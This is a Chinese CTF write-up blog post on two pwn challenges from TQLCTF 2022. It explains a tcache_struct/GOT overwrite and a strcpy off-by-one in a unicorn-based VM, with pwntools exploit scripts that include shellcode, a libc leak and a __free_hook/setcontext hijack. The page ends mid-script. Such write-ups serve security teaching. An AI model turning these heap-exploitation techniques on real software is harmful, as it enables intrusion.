<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="2022TQLCTF WPunbelievable_write 程序没开PIE，GOT表也是可写的 C1  C2  C3  这题关键就是过掉C3的check，也就是能往target上写值 C2给了一次free任意地址的机会，v0 = ptr，ptr是init的时候malloc的，v1可以是负值  理论上通过C2free掉目标地址，然后用C1分配回来实现任意写，但是由于C1malloc之后紧跟着就会">
<meta property="og:type" content="article">
<meta property="og:title" content="2022TQLCTF WP">
<meta property="og:url" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/index.html">
<meta property="og:site_name" content="zzrR0">
<meta property="og:description" content="2022TQLCTF WPunbelievable_write 程序没开PIE，GOT表也是可写的 C1  C2  C3  这题关键就是过掉C3的check，也就是能往target上写值 C2给了一次free任意地址的机会，v0 = ptr，ptr是init的时候malloc的，v1可以是负值  理论上通过C2free掉目标地址，然后用C1分配回来实现任意写，但是由于C1malloc之后紧跟着就会">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301172749652.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301172846301.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301172855950.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301172957070.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301173428237.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301174236635.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301174312733.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301174329132.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301175519003.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301175552505.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301175721916.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301180028939.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301205440224.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301205831471.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301210143646.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301210556637.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301210706512.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301210802013.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301210809549.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301211017245.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220302091050404.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220302091854224.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220302095520595.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220302095548141.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220302101844205.png">
<meta property="og:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220302101927734.png">
<meta property="og:updated_time" content="2022-03-03T01:17:19.258Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2022TQLCTF WP">
<meta name="twitter:description" content="2022TQLCTF WPunbelievable_write 程序没开PIE，GOT表也是可写的 C1  C2  C3  这题关键就是过掉C3的check，也就是能往target上写值 C2给了一次free任意地址的机会，v0 = ptr，ptr是init的时候malloc的，v1可以是负值  理论上通过C2free掉目标地址，然后用C1分配回来实现任意写，但是由于C1malloc之后紧跟着就会">
<meta name="twitter:image" content="http://yoursite.com/2022/03/02/2022TQLCTFWP/image-20220301172749652.png">






  <link rel="canonical" href="http://yoursite.com/2022/03/02/2022TQLCTFWP/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>2022TQLCTF WP | zzrR0</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zzrR0</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2022/03/02/2022TQLCTFWP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zzrR0">
      <meta itemprop="description" content="Why am i so cai.">
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zzrR0">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2022TQLCTF WP
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2022-03-02 10:21:54" itemprop="dateCreated datePublished" datetime="2022-03-02T10:21:54+08:00">2022-03-02</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2022-03-03 09:17:19" itemprop="dateModified" datetime="2022-03-03T09:17:19+08:00">2022-03-03</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2022/03/02/2022TQLCTFWP/#comments" itemprop="discussionUrl">
                
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2022/03/02/2022TQLCTFWP/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2022/03/02/2022TQLCTFWP/" class="leancloud_visitors" data-flag-title="2022TQLCTF WP">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数：</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="2022TQLCTF-WP"><a href="#2022TQLCTF-WP" class="headerlink" title="2022TQLCTF WP"></a>2022TQLCTF WP</h1><h2 id="unbelievable-write"><a href="#unbelievable-write" class="headerlink" title="unbelievable_write"></a>unbelievable_write</h2><p><img src="/2022/03/02/2022TQLCTFWP/image-20220301172749652.png" alt="image-20220301172749652"></p>
<p>程序没开PIE，GOT表也是可写的</p>
<p>C1</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301172846301.png" alt="image-20220301172846301"></p>
<p>C2</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301172855950.png" alt="image-20220301172855950"></p>
<p>C3</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301172957070.png" alt="image-20220301172957070"></p>
<p>这题关键就是过掉C3的check，也就是能往target上写值</p>
<p>C2给了一次free任意地址的机会，v0 = ptr，ptr是init的时候malloc的，v1可以是负值</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301173428237.png" alt="image-20220301173428237"></p>
<p>理论上通过C2free掉目标地址，然后用C1分配回来实现任意写，但是由于C1malloc之后紧跟着就会free掉，而free会有check的，所以也不能任意地址写</p>
<p>这题的思路是向前free掉tcache struct，由于tcache_struct本身就是一个chunk，所以后面修改它再free也不会有什么问题</p>
<p><a href="https://hackmd.io/@5Mo2wp7RQdCOYcqKeHl2mw/ByTHN47jf" target="_blank" rel="noopener">TCACHE exploitation - HackMD</a></p>
<p>通过C1修改tcache_struct，在tcachelist上填入两个地址，一个是free的got地址，一个是target的地址，首先修改free的got为puts的plt地址，这样后面就可以过掉free这个限制，然后再分配到target实现任意地址写</p>
<p>以释放掉一个0x40的堆块做测试</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301174236635.png" alt="image-20220301174236635"></p>
<p>tcache的结构是 从0x405040开始是0x20 0x30 0x40………………的tcache entries</p>
<p>100000 是 00 00 01代表0x20 0x30 0x40chunks的数量，没什么问题</p>
<p>我们要改的地址是0x404018</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301174312733.png" alt="image-20220301174312733"></p>
<p>给他转向到这里就行了0x4010F0</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301174329132.png" alt="image-20220301174329132"></p>
<h3 id="exp-简要分析"><a href="#exp-简要分析" class="headerlink" title="exp + 简要分析"></a>exp + 简要分析</h3><p>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"><span class="comment">#sh = process("./grape")</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"><span class="comment">#Context.terminal = ['tmux', 'splitw', '-h']</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">C1</span><span class="params">(size,content)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">"&gt;"</span>,<span class="string">"1"</span>)</span><br><span class="line">    sh.sendline(str(size))</span><br><span class="line">    sh.sendline(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">C2</span><span class="params">(offset)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">"&gt;"</span>,<span class="string">"2"</span>)</span><br><span class="line">    sh.sendline(str(offset))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">C3</span><span class="params">()</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">"&gt;"</span>,<span class="string">"3"</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(sh,<span class="string">"b *0x40154D"</span>)</span><br><span class="line">C2(<span class="number">-0x250</span>)</span><br><span class="line">C1(<span class="number">0x240</span>,p64(<span class="number">0</span>)*<span class="number">2</span>+p64(<span class="number">0x0101</span>) +p64(<span class="number">0</span>)*<span class="number">5</span> +p64(<span class="number">0</span>)*<span class="number">16</span>+ p64(<span class="number">0x404018</span>) + p64(<span class="number">0x404080</span>))</span><br><span class="line"><span class="comment">#0x120  0x130</span></span><br><span class="line">C1(<span class="number">0x110</span>,p64(<span class="number">0x4010F0</span>)+p64(<span class="number">0x0401040</span>))</span><br><span class="line">C1(<span class="number">0x120</span>,p64(<span class="number">0xFEDCBA9876543211</span>))</span><br><span class="line">C3()</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<p>具体写到那哪个大小的tcache entries上无所谓，只要构造对就行了，</p>
<p>这里还有个小细节是覆盖got表时是</p>
<p>C1(0x110,p64(0x4010F0)+p64(0x0401040))</p>
<p>为了达到目的只需要覆盖free的got为0x4010F0就行，但是由于取出tcache的时候，会清空chunk的前0x16字节，所以导致puts的got被改成0了，如果我们这里不多写个p64(0x0401040)把他恢复的话，会导致puts不能用，free也就错了</p>
<h2 id="EZVM"><a href="#EZVM" class="headerlink" title="EZVM"></a>EZVM</h2><p>非常费劲的一个题</p>
<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p><img src="/2022/03/02/2022TQLCTFWP/image-20220301175519003.png" alt="image-20220301175519003"></p>
<p>程序开始会读入我们传的shellcode，但是shellcode里面不能有10，所以后面操作数里面有10的时候得变换一下</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301175552505.png" alt="image-20220301175552505"></p>
<p>然后会创建一个unicorn虚拟机，架构是x86_64，虽然这里写的是i386</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301175721916.png" alt="image-20220301175721916"></p>
<p>创建了两块内存，一块是代码段数据段，一块是堆栈，紧接着把我6们传入的code写到代码段，</p>
<p>uc_hook_add是添加hook函数，这里是针对系统调用hook，UC_X86_INS_SYSCALL是我解析的unicorn的头文件</p>
<p>ps：运行结束后的打印我做了patch，打印的不再是ecx和edx，而是eip和esp，这样方便后面查错</p>
<p>hook函数对open write read close都进行了重写</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301180028939.png" alt="image-20220301180028939"></p>
<p>open_hook</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301205440224.png" alt="image-20220301205440224"></p>
<p>这里mem_read参数没显示，就是从src中读data到buf里面，是unicorn虚拟机和物理机之间的交互</p>
<p>sub_1A66</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301205831471.png" alt="image-20220301205831471"></p>
<p>这里实际上是自己实现的类似于Linux中的FILE结构，所有的selfFILE结构呈数组存放在unk_5020处，一个selfFILE的大小是72，</p>
<p>offset0处存放的是fileno，8处存放的是filename，4*8处有一个data_ptr,模拟磁盘文件，对这个文件的读写都是往这个dataptr里面写，</p>
<p>然后是自己写的read  write  close</p>
<p>self_file_read</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301210143646.png" alt="image-20220301210143646"></p>
<p>a1传的是fd，a1+40是这个文件数据区的大小，这里进行了严格比较，所以没漏洞</p>
<p>self_file_write</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301210556637.png" alt="image-20220301210556637"></p>
<p>这里realloc的使用也没什么问题，逻辑就是将data拷贝数据区</p>
<p>self_file_close</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301210706512.png" alt="image-20220301210706512"></p>
<p>都清零了所有是没UAF的，但是内容没清零，所以可以重新分配回来泄露libc</p>
<p>另外程序初始也是预置提供了标准输入输出</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301210802013.png" alt="image-20220301210802013"></p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301210809549.png" alt="image-20220301210809549"></p>
<p>分析完其自实现的文件描述符机制，后面hook的write read close实际就是调用上面虚表中的self函数</p>
<p>这些函数都没什么问题，本题漏洞在于strcpy的使用，这里filename的长度是0x18，紧跟着是data_ptr</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220301211017245.png" alt="image-20220301211017245"></p>
<p>strcpy拷贝时会多拷贝一个0，所以这里存在一个offbyone，利用就很清晰了，可以offbyone也就可以打chunkoverlapping，然后可以打tcache attack到_free_hook之后就是orw(以后看题一定要看是否开了沙箱，忘了orw真的很浪费时间)</p>
<h3 id="tcache-attack"><a href="#tcache-attack" class="headerlink" title="tcache attack"></a>tcache attack</h3><p>tcache entry -&gt; chunk1 -&gt; chunk2 </p>
<p>tcache entry -&gt; chunk1 -&gt; target</p>
<p>就是修改chunk1中的指针到target然后就能分配到了，这里必须是先有两个chunk</p>
<p>不能是</p>
<p>tcache entry -&gt; chunk1 -&gt; null</p>
<p>tcache entry -&gt; chunk1 -&gt; target</p>
<p>这种情况下，tcache的counts是1，所以是分配不出来target的，(分配出chunk1之后count为0，就没法分配了)</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p><img src="/2022/03/02/2022TQLCTFWP/image-20220302091050404.png" alt="image-20220302091050404"></p>
<p>可以把基础操作封装成上面这种，我对操作fd为10的时候辽特判，主要是为了避免shellcode里存在10</p>
<p>另外在构造code的时候，unicorn在执行的时候老是有个内存错误，至今查不出来错误在哪，这个点卡了我巨长时间，后来我是在每个函数后面</p>
<p><img src="/2022/03/02/2022TQLCTFWP/image-20220302091854224.png" alt="image-20220302091854224"></p>
<p>加了个nop，就过了</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><p>贴下nu1l的标准exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span><span class="params">(fd,addr,size)</span>:</span></span><br><span class="line"> sc = <span class="string">'''</span></span><br><span class="line"><span class="string"> xor eax,eax;</span></span><br><span class="line"><span class="string"> push &#123;&#125;;</span></span><br><span class="line"><span class="string"> pop rdi;</span></span><br><span class="line"><span class="string"> mov rsi,&#123;&#125;;</span></span><br><span class="line"><span class="string"> push &#123;&#125;;</span></span><br><span class="line"><span class="string"> pop rdx;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span class="line"><span class="string"> '''</span>.format(fd,addr,size)</span><br><span class="line"> <span class="keyword">return</span> sc</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span><span class="params">(fd,addr,size)</span>:</span></span><br><span class="line"> sc = <span class="string">'''</span></span><br><span class="line"><span class="string"> push 1;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> push &#123;&#125;;</span></span><br><span class="line"><span class="string"> pop rdi;</span></span><br><span class="line"><span class="string"> mov rsi,&#123;&#125;;</span></span><br><span class="line"><span class="string"> push &#123;&#125;;</span></span><br><span class="line"><span class="string"> pop rdx;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span class="line"><span class="string"> '''</span>.format(fd,addr,size)</span><br><span class="line"> <span class="keyword">return</span> sc</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">close</span><span class="params">(fd)</span>:</span></span><br><span class="line"> sc = <span class="string">'''</span></span><br><span class="line"><span class="string"> push 3;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> push &#123;&#125;;</span></span><br><span class="line"><span class="string"> pop rdi;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span class="line"><span class="string"> '''</span>.format(fd)</span><br><span class="line"> <span class="keyword">return</span> sc</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">insert</span><span class="params">(name_addr,size)</span>:</span></span><br><span class="line"> sc = <span class="string">'''</span></span><br><span class="line"><span class="string"> push 2;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> mov rdi,&#123;&#125;;</span></span><br><span class="line"><span class="string"> push &#123;&#125;;</span></span><br><span class="line"><span class="string"> pop rsi;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">syscall;</span></span><br><span class="line"><span class="string"> '''</span>.format(name_addr,size)</span><br><span class="line"> <span class="keyword">return</span> sc</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_name</span><span class="params">(idx)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0x7FFFFFFEF000</span>+<span class="number">0x20</span>*idx</span><br><span class="line">sc = <span class="string">''</span></span><br><span class="line">sc += read(<span class="number">0</span>,get_name(<span class="number">0</span>),<span class="number">0x20</span>)</span><br><span class="line">sc += insert(get_name(<span class="number">0</span>),<span class="number">0xb0</span>)<span class="comment">#3</span></span><br><span class="line">sc += read(<span class="number">3</span>,get_name(<span class="number">1</span>),<span class="number">0x100</span>)</span><br><span class="line">sc += write(<span class="number">1</span>,get_name(<span class="number">1</span>),<span class="number">8</span>)</span><br><span class="line">sc += read(<span class="number">0</span>,get_name(<span class="number">2</span>),<span class="number">0x20</span>)</span><br><span class="line">sc += insert(get_name(<span class="number">2</span>),<span class="number">0x100</span>)<span class="comment">#4</span></span><br><span class="line">sc += read(<span class="number">0</span>,get_name(<span class="number">3</span>),<span class="number">0x20</span>)</span><br><span class="line">sc += insert(get_name(<span class="number">3</span>),<span class="number">0xb0</span>)<span class="comment">#5</span></span><br><span class="line">sc += read(<span class="number">0</span>,get_name(<span class="number">4</span>),<span class="number">0x300</span>)</span><br><span class="line">sc += close(<span class="number">5</span>)</span><br><span class="line">sc += close(<span class="number">3</span>)</span><br><span class="line">sc += write(<span class="number">4</span>,get_name(<span class="number">4</span>),<span class="number">0x38</span>)</span><br><span class="line">sc += insert(get_name(<span class="number">0</span>),<span class="number">0xb0</span>)</span><br><span class="line">sc += insert(get_name(<span class="number">3</span>),<span class="number">0xb8</span>)</span><br><span class="line">sc += write(<span class="number">5</span>,get_name(<span class="number">4</span>)+<span class="number">0x38</span>,<span class="number">0xb8</span>)</span><br><span class="line">sc += <span class="string">'mov rdx,0x100;'</span></span><br><span class="line">sc = asm(sc)</span><br><span class="line"><span class="comment"># s = process("./easyvm",env=&#123;'LD_PRELOAD':'./libunicorn.so.1'&#125;)</span></span><br><span class="line">s = remote(<span class="string">"120.24.82.252"</span>,<span class="string">"21545"</span>)</span><br><span class="line"><span class="comment"># gdb.attach(s,"b *$rebase(0x1720)\nc\nd\nb *$rebase(0x1857)\nc\nc\nd\nb free\nc")</span></span><br><span class="line">s.sendlineafter(<span class="string">'Send your code:'</span>,sc)</span><br><span class="line">name = <span class="string">'/dev/a'</span></span><br><span class="line">s.send(name)</span><br><span class="line">sleep(<span class="number">0.5</span>)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.31.so"</span>)</span><br><span class="line">libc.address = u64(s.recvuntil(<span class="string">"\x7f"</span>)[<span class="number">-6</span>:]+<span class="string">'\x00\x00'</span>)<span class="number">-0x1ec1f0</span></span><br><span class="line">success(hex(libc.address))</span><br><span class="line">s.send(<span class="string">'/dev/'</span>.ljust(<span class="number">0x18</span>,<span class="string">'b'</span>))</span><br><span class="line">sleep(<span class="number">0.5</span>)</span><br><span class="line">s.send(<span class="string">'/dev/c'</span>)</span><br><span class="line">sleep(<span class="number">0.5</span>)</span><br><span class="line">payload =</span><br><span class="line">p64(libc.address+<span class="number">0x0000000000154930</span>)+p64(libc.sym[<span class="string">'__free_hook'</span>]<span class="number">-0x10</span>)+p64(libc.sym[<span class="string">'se</span></span><br><span class="line"><span class="string">tcontext'</span>]+<span class="number">61</span>)</span><br><span class="line">sig = SigreturnFrame()</span><br><span class="line">sig.rsp = libc.bss(<span class="number">0x500</span>)</span><br><span class="line">sig.rip = libc.sym[<span class="string">'read'</span>]</span><br><span class="line">sig.rdi = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sig.rsi = libc.bss(<span class="number">0x500</span>)</span><br><span class="line">sig.rdx = <span class="number">0x300</span></span><br><span class="line">sig = 